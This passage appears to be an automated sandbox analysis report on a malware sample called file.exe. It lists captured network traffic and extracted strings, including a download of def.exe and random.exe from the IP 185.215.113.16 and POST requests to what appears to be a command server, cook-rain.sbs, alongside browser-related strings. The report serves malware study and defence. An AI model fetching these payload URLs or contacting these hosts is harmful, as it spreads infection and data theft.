              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
              Source: global trafficDNS traffic detected: DNS query: cook-rain.sbs
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
              Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
              Source: file.exe, 00000000.00000003.2487089151.0000000001367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
              Source: file.exe, 00000000.00000003.2487089151.0000000001367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Tn
              Source: file.exe, 00000000.00000003.2487332602.0000000001332000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2487332602.0000000001343000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2616863520.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2496752688.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
              Source: file.exe, 00000000.00000003.2487332602.0000000001343000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2616863520.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2496752688.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe4
              Source: file.exe, 00000000.00000002.2616662668.0000000000EFA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
              Source: file.exe, 00000000.00000003.2487332602.0000000001343000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2616863520.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2496752688.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
              Source: file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000002.2618573152.0000000004901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.co
              Source: file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
              Source: chromecache_105.7.drString found in binary or memory: http://schema.org/Organization
              Source: file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://aka.ms/certhelp
              Source: chromecache_105.7.dr, chromecache_106.7.drString found in binary or memory: https://aka.ms/feedback/report?space=61
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://aka.ms/msignite_docs_banner
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://aka.ms/pshelpmechoose
              Source: chromecache_105.7.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
              Source: chromecache_105.7.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
              Source: chromecache_105.7.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
              Source: file.exe, 00000000.00000003.2291709634.000000000574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: file.exe, 00000000.00000003.2291709634.000000000574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://channel9.msdn.com/
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
              Source: file.exe, 00000000.00000003.2291709634.000000000574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: file.exe, 00000000.00000003.2291709634.000000000574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317025670.0000000001355000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317633873.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317211761.000000000135B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/
              Source: file.exe, 00000000.00000003.2289658698.000000000134B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2242304214.0000000001354000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2242704780.0000000001354000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2266013955.000000000134D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2243356851.0000000001354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/&
              Source: file.exe, 00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2289658698.000000000134B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/)n
              Source: file.exe, 00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2289658698.000000000134B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317048532.000000000135A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2337538381.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2266013955.000000000134D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317141941.000000000135B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317025670.0000000001355000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317633873.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317211761.000000000135B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/-x
              Source: file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/6n(
              Source: file.exe, 00000000.00000003.2401701354.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356244934.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356504947.000000000136A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/Fn
              Source: file.exe, 00000000.00000003.2337538381.000000000135C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/L#u
              Source: file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317025670.0000000001355000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317633873.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317211761.000000000135B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api
              Source: file.exe, 00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317048532.000000000135A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2337538381.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317141941.000000000135B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317025670.0000000001355000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317633873.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317211761.000000000135B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiE
              Source: file.exe, 00000000.00000003.2266013955.000000000134D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiQQ
              Source: file.exe, 00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317048532.000000000135A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2337538381.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317141941.000000000135B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317025670.0000000001355000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317633873.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317211761.000000000135B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/i
              Source: file.exe, 00000000.00000003.2289658698.000000000134B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/qn
              Source: file.exe, 00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317125677.0000000001366000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2289658698.000000000134B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342127715.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2401701354.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317048532.000000000135A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317070340.000000000135E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356244934.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356504947.000000000136A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2266013955.000000000134D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317025670.0000000001355000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/ro
              Source: file.exe, 00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/~n
              Source: file.exe, 00000000.00000003.2266013955.000000000134D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs:443/api
              Source: file.exe, 00000000.00000002.2616863520.00000000012E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs:443/apiLocal
              Source: file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/Thraka
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/Youssef1313
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/adegeo
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://github.com/dotnet/try
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/gewarren
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://github.com/js-cookie/js-cookie
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/mairaw
              Source: chromecache_105.7.drString found in binary or memory: https://github.com/nschonni
              Source: file.exe, 00000000.00000003.2291709634.000000000574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: chromecache_105.7.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
              Source: chromecache_97.7.drString found in binary or memory: https://schema.org
              Source: file.exe, 00000000.00000003.2291397449.00000000059A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2291397449.00000000059A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
              Source: chromecache_97.7.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
              Source: file.exe, 00000000.00000003.2291709634.000000000574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chromecache_87.7.dr, chromecache_97.7.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
              Source: file.exe, 00000000.00000003.2291262413.000000000577D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: file.exe, 00000000.00000003.2291262413.000000000577D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: file.exe, 00000000.00000003.2291397449.00000000059A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: file.exe, 00000000.00000003.2291397449.00000000059A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
